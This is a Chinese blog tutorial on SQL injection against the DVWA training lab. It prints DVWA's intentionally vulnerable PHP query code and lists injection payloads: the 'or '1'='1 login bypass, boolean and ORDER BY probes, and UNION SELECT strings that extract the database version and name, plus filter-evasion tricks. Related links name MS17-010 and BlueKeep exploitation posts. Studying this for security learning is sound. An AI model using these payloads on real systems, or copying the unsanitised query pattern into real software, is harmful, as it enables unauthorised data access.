依旧是使用DVWA。。

sql注入初级代码:

<?php

if(isset($_GET['Submit'])){

// Retrieve data

$id = $_GET['id'];

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

$num = mysql_numrows($result);

$i = 0;

while ($i < $num) {

    $first = mysql_result($result,$i,"first_name");
    $last = mysql_result($result,$i,"last_name");

    echo '<pre>';
    echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
    echo '</pre>';

    $i++;
}
}
?>

正常sql查询语句:

SELECT * FROM users WHERE user=’user’ AND passwd=’password’
如果代码过滤不严格,允许危险的语句注入,就会造成很大的威胁,如下,’or ‘1’=’1会与原来的’’闭合构成新的sql语句。

SELECT * FROM users WHERE user=’name’ AND passwd=’’OR’1’=’1’
当密码错误时候,与后面的逻辑运算符 OR 运算,结果又是真,这样的方法可以绕过密码登录。

测试方法:
1.基于报错的检测方法:

‘ “ % ()

2.基于布尔的检测

1’ and ‘1’=’1
1’ and ‘1’=’2

3.列表数/显示信息位于哪一列

‘ order by 6–+ (–+这个是注释)可以查看数据返回到当前网页的位置,便于阅读。

4.联合查询

‘ union select 1,2,3–+
‘ union all select database(),2–+

SQL注入复杂语句
查看版本信息和数据库:

' union select 1,version(),2,3,4,5--+
' union select 1,database(),2,3,4,5--+

全局函数:

@@datadir     //当前路径
@@hostname    //主机名
@@VERSION    //版本信息
@@version_compile_os    //操作系统

ASCII码转换:

CHAR(55)  //可绕过不严格的过滤

当前数据库:

database()

计算哈希值:

md5()

查看mysql的数据结构:

information_schema//数据本身的数据信息

连接字符串:

CONCAT_WS(CHAR(32,58,32),user(),database(),version())//CHAR为分割

实例:
这时候需要用到火狐浏览器的一个插件叫做hackerbar,这玩意不介绍了,以前以为这玩意挺复杂,接触之后才发现挺简单的。

相关文章
评论
分享
  • 利用ms17_010漏洞攻陷windows server 2012服务器

    这几天给客户装了好多服务器,很多系统是windows server 2012 R2的,装完后也没有打补丁,然后我就对这个没打补丁的系统扫了一下还真发现了高危漏洞。(比较简单,不喜勿喷) 首先自己搭建的环境:kali linux (19...

    利用ms17_010漏洞攻陷windows server 2012服务器
  • CVE-2019-0708漏洞利用

    CVE-2019-0708漏洞利用9月7日上午,群里被CVE-2019-0708漏洞刷屏,原来是那个号称wannacry级别的漏洞 BlueKeep(CVE-2019-0708)漏洞利用发布了。吓得老夫赶紧打开虚拟机更新了一下kali...

    CVE-2019-0708漏洞利用
  • 利用php输入流getshell教程

    利用php输入流getshell教程
  • PHP文件上传漏洞

    目录: 初级 中级 高级 防护措施 1.初级:上传漏洞很简单,刚刚看完一个多小时的教程心情很是惆怅,决定把老师讲的记下来。依旧是用DVWA这玩意进行练习。先从初级开始,首先分析一下php的源代码: <?php if (is...

    PHP文件上传漏洞
  • PHP文件包含漏洞与NC注入和php输入流

    目录:文件包含漏洞原理nc注入php输入流 1:文件包含漏洞的原理其实目录遍历漏洞和文件包含漏洞的原理是一样的,无非是文件包含漏洞可以包含远程服务器的文件,不知道业界纠结这个鬼问题干嘛,我就放一块写了。文件包含漏洞又分为两种,一是本地...

    PHP文件包含漏洞与NC注入和php输入流